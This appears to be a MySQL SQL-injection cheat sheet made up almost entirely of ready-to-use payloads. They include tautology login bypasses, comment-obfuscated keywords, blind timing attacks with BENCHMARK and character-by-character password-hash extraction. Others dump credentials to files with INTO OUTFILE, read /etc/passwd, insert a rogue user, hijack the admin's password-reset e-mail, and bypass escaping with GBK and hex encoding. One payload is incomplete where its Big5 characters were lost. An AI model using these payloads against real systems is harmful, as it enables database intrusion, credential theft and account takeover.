Basics. SELECT * FROM login /* foobar */ SELECT * FROM login WHERE id = 1 or 1=1 SELECT * FROM login WHERE id = 1 or 1=1 AND user LIKE "%root%" Variations. SELECT * FROM login WHE/**/RE id = 1 o/**/r 1=1 SELECT * FROM login WHE/**/RE id = 1 o/**/r 1=1 A/**/ND user L/**/IKE "%root%" SHOW TABLES SELECT * FROM login WHERE id = 1 or 1=1; SHOW TABLES SELECT VERSION SELECT * FROM login WHERE id = 1 or 1=1; SELECT VERSION() SELECT host,user,db from mysql.db SELECT * FROM login WHERE id = 1 or 1=1; select host,user,db from mysql.db; Blind injection vectors. Operators SELECT 1 && 1; SELECT 1 || 1; SELECT 1 XOR 0; All of these evaluate to TRUE (1). SELECT 0.1 <= 2; SELECT 2 >= 2; SELECT ISNULL(1/0); Math SELECT FLOOR(7 + (RAND() * 5)); SELECT ROUND(23.298, -1); Misc SELECT LENGTH(COMPRESS(REPEAT('a',1000))); SELECT MD5('abc'); Benchmark SELECT BENCHMARK(10000000,ENCODE('abc','123')); this takes around 5 sec on a localhost SELECT BENCHMARK(1000000,MD5(CHAR(116))) this takes around 7 sec on a localhost SELECT BENCHMARK(10000000,MD5(CHAR(116))) this takes around 70 sec on a localhost Using the delay to check whether a user exists SELECT IF( user = 'root', BENCHMARK(1000000,MD5( 'x' )),NULL) FROM login Beware of the N rounds: adding an extra zero could stall or crash your browser! 
Gathering info Table mapping SELECT COUNT(*) FROM tablename Field mapping SELECT * FROM tablename WHERE user LIKE "%root%" SELECT * FROM tablename WHERE user LIKE "%" SELECT * FROM tablename WHERE user = 'root' AND id IS NOT NULL; SELECT * FROM tablename WHERE user = 'x' AND id IS NULL; User mapping SELECT * FROM tablename WHERE email = 'user@site.com'; SELECT * FROM tablename WHERE user LIKE "%root%" SELECT * FROM tablename WHERE user = 'username' Advanced SQL vectors Writing info into files SELECT password FROM tablename WHERE username = 'root' INTO OUTFILE '/path/location/on/server/www/passes.txt' Writing info into files without single quotes: (example) SELECT password FROM tablename WHERE username = CONCAT(CHAR(39),CHAR(97),CHAR(100),CHAR(109),CHAR(105),CHAR(110),CHAR( 39)) INTO OUTFILE CONCAT(CHAR(39),CHAR(97),CHAR(100),CHAR(109),CHAR(105),CHAR(110),CHAR( 39)) Note: you must specify a new file (it must not already exist) and give the correct pathname. The CHAR() quoteless function SELECT * FROM login WHERE user = CONCAT(CHAR(39),CHAR(97),CHAR(100),CHAR(109),CHAR(105),CHAR(110),CHAR( 39)) SELECT * FROM login WHERE user = CHAR(39,97,39) Extracting hashes SELECT user FROM login WHERE user = 'root' UNION SELECT IF(SUBSTRING(pass,1,1) = CHAR(97), BENCHMARK(1000000,MD5('x')),null) FROM login example: SELECT user FROM login WHERE user = 'admin' UNION SELECT IF(SUBSTRING(passwordfield,1,1) = CHAR(97), BENCHMARK(1000000,MD5('x')),null) FROM login SELECT user FROM login WHERE user = 'admin' UNION SELECT IF(SUBSTRING(passwordfield,1,2) = CHAR(97,97), BENCHMARK(1000000,MD5('x')),null) FROM login explanation: the arguments are (passwordfield, startcharacter, selectlength), so: (password,1,2) selects 'ab'; (password,1,3) selects 'abc'; (password,1,4) selects 'abcd' A quoteless example: SELECT user FROM login WHERE user = CONCAT(CHAR(39),CHAR(97),CHAR(100),CHAR(109),CHAR(105),CHAR(110),CHAR( 39)) UNION SELECT IF(SUBSTRING(pass,1,2) = CHAR(97,97), 
BENCHMARK(1000000,MD5(CHAR(59))),null) FROM login Possible chars: 0 to 9 – ASCII 48 to 57; a to z – ASCII 97 to 122 Misc Insert a new user into DB INSERT INTO login SET user = 'r00t', pass = 'abc' Retrieve /etc/passwd file, put it into a field and insert a new user load data infile "/etc/passwd" INTO table login (profiletext, @var1) SET user = 'r00t', pass = 'abc' Then login! Write the DB user table out into tmp SELECT host,user,password FROM user into outfile '/tmp/passwd'; Change admin e-mail, for “forgot login retrieval.” UPDATE users set email = 'mymail@site.com' WHERE email = 'admin@site.com'; Bypassing PHP functions (MySQL 4.1.x before 4.1.20 and 5.0.x) Bypassing addslashes() with GBK encoding WHERE x = 0xbf27admin 0xbf27 Bypassing mysql_real_escape_string() with BIG5 or GBK "injection string" [Big5 multibyte characters — lost in extraction] the above chars are Chinese Big5 Advanced Vectors Using a HEX encoded query to bypass escaping. Normal: SELECT * FROM login WHERE user = 'root' Bypass: SELECT * FROM login WHERE user = 0x726F6F74 Inserting a new user in SQL. Normal: insert into login set user = 'root', pass = 'root' Bypass: insert into login set user = 0x726F6F74, pass = 0x726F6F74 How to determine the HEX value for injection. SELECT HEX('root'); gives you: 726F6F74 then add: 0x before it.